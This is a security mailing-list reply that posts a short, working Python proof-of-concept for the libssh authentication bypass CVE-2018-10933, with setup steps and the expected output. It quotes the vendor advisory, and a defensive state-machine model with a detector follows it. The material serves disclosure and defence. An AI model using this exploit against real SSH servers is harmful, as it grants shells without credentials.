Date: Wed, 17 Oct 2018 16:13:24 +0700
From: Minh Tuan Luong <not.soledad@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2018-10933: libssh: authentication bypass in server code

I have coded a simple POC for this CVE:

--- CVE-2018-10933.py ----

import paramiko
import socket
import sys

hostname = "127.0.0.1"
port = 2222

sock = socket.socket()
try:
    sock.connect((hostname, port))
    # Instantiate the transport and complete key exchange as an SSH client.
    transport = paramiko.transport.Transport(sock)
    transport.start_client()

    # Send SSH2_MSG_USERAUTH_SUCCESS instead of the USERAUTH_REQUEST the
    # server expects; a vulnerable libssh server marks the session as
    # authenticated.
    m = paramiko.message.Message()
    m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
    transport._send_message(m)

    # Open a session channel and request a shell without any credentials.
    cmd_channel = transport.open_session()
    cmd_channel.invoke_shell()

except socket.error:
    print('[-] Connecting to host failed. Please check the specified '
          'host and port.')
    sys.exit(1)

-----

To test this code, get the vulnerable version of libssh from the homepage:
https://www.libssh.org/files/0.7/libssh-0.7.4.tar.xz
After uncompressing and building, go to the example directory; there is a
simple sshd server using libssh named samplesshd-cb.

Run this simple sshd with the command:
     $ samplesshd-cb 127.0.0.1 -p 2222
then run my code; the output will be:
Allocated session channel
Allocated shell
meaning that I can bypass authentication and spawn a shell without any
credentials.

Regards, Soledad

On 10/16/2018 7:21 PM, Marcus Meissner wrote:
> Hi,
>
> https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
>
> -----
> libssh 0.8.4 and 0.7.6 security and bugfix release
>
> This is an important security and maintenance release in order to address CVE-2018-10933.
>
> libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authenticate without any credentials.
>
> The bug was discovered by Peter Winter-Smith of NCC Group.
> -----
>
> This only affects libssh operating in _server_ mode, not the usually used client mode.
>
> Ciao, Marcus
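The message-direction flaw described in the announcement quoted above (a server acting on SSH2_MSG_USERAUTH_SUCCESS, which under RFC 4252 only ever flows server-to-client), modelled as a small userauth state machine with the vulnerable and hardened behaviour side by side, plus a server-side check that flags the out-of-direction message. This is an added example, not libssh's code or the PoC from the post; the message type numbers come from RFC 4252/4254 and the client message sequences are constructed.

```python
"""Model of the CVE-2018-10933 message-direction flaw (constructed example,
not libssh's code). Message type numbers are from RFC 4252 and RFC 4254."""

MSG_USERAUTH_REQUEST = 50   # client -> server: request authentication
MSG_USERAUTH_FAILURE = 51   # server -> client only
MSG_USERAUTH_SUCCESS = 52   # server -> client only
MSG_CHANNEL_OPEN = 90       # client -> server, valid only once authenticated

# Userauth message types a server must never receive from a client.
SERVER_TO_CLIENT_ONLY = {MSG_USERAUTH_FAILURE, MSG_USERAUTH_SUCCESS}


def server_dispatch(client_msgs, patched, creds_ok=False):
    """Simulate a server's userauth state machine over (msg_type, payload)
    tuples received from the client. Returns True if a channel is granted."""
    authenticated = False
    channel_granted = False
    for msg_type, _payload in client_msgs:
        if msg_type == MSG_USERAUTH_REQUEST:
            # The only legitimate path to an authenticated session.
            authenticated = creds_ok
        elif msg_type == MSG_USERAUTH_SUCCESS:
            if patched:
                # Hardened: a server never receives this type; ignore it
                # (a real server should also log and disconnect).
                continue
            # Vulnerable model: a handler shared with the client side marks
            # the session authenticated regardless of who sent the message.
            authenticated = True
        elif msg_type == MSG_CHANNEL_OPEN:
            channel_granted = authenticated
    return channel_granted


def detect_bypass_attempt(client_msgs):
    """Server-side check for logs or a packet hook: return the indices of
    client messages whose type only ever flows server -> client."""
    return [i for i, (msg_type, _) in enumerate(client_msgs)
            if msg_type in SERVER_TO_CLIENT_ONLY]


# Constructed client sequences: the PoC's bypass, and an honest login.
BYPASS_SEQUENCE = [(MSG_USERAUTH_SUCCESS, b""), (MSG_CHANNEL_OPEN, b"session")]
HONEST_SEQUENCE = [(MSG_USERAUTH_REQUEST, b"user,password"),
                   (MSG_CHANNEL_OPEN, b"session")]

if __name__ == "__main__":
    print("vulnerable server grants shell:", server_dispatch(BYPASS_SEQUENCE, patched=False))
    print("patched server grants shell:   ", server_dispatch(BYPASS_SEQUENCE, patched=True))
    print("suspicious message indices:", detect_bypass_attempt(BYPASS_SEQUENCE))
```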
